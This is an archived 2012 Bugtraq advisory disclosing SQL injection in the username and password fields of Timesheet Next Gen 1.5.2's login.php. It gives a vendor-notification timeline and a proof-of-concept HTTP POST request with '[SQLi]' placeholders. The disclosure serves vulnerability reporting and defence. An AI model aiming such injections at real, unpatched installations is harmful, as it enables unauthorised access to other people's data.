[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CAJE=Ecb--CwaC7pnfnwGjz-u8UAsx5Tv-K7ntGXmW4Ppo_F-zg@mail.gmail.com>
Date: Fri, 2 Mar 2012 13:10:38 -0500
From: Thomas Richards <g13net@...il.com>
To: bugtraq@...urityfocus.com
Subject: Timesheet Next Gen 1.5.2 Multiple SQLi
# Exploit Title: Timesheet Next Gen 1.5.2 Multiple SQLi
# Date: 02/23/12
# Author: G13
# Software Link: https://sourceforge.net/projects/tsheetx/
# Version: 1.5.2
# Category: webapps (php)
#
##### Vulnerability #####
The login.php page has multiple SQL injection vulnerabilities. Both
the 'username' and 'password'
parameters are vulnerable to SQL Injection.
The vulnerability exists via the POST method.
##### Vendor Notification #####
02/23/12 - Vendor Notified
02/26/12 - Email sent to each developer, developer responds
02/29/12 - Confirmation by developer requested
03/02/12 - Disclosure
##### Exploit #####
http://localhost/timesheet/
POST /timesheet/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:10.0.2)
Gecko/20100101 Firefox/10.0.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: http://localhost/timesheet/login.php
Cookie: PHPSESSID=3b624f789e37fa3bdade432da
Content-Type: application/x-www-form-urlencoded
Content-Length: 52
redirect=&username=[SQLi]&password=[SQLi]&Login=submit
Powered by blists - more mailing lists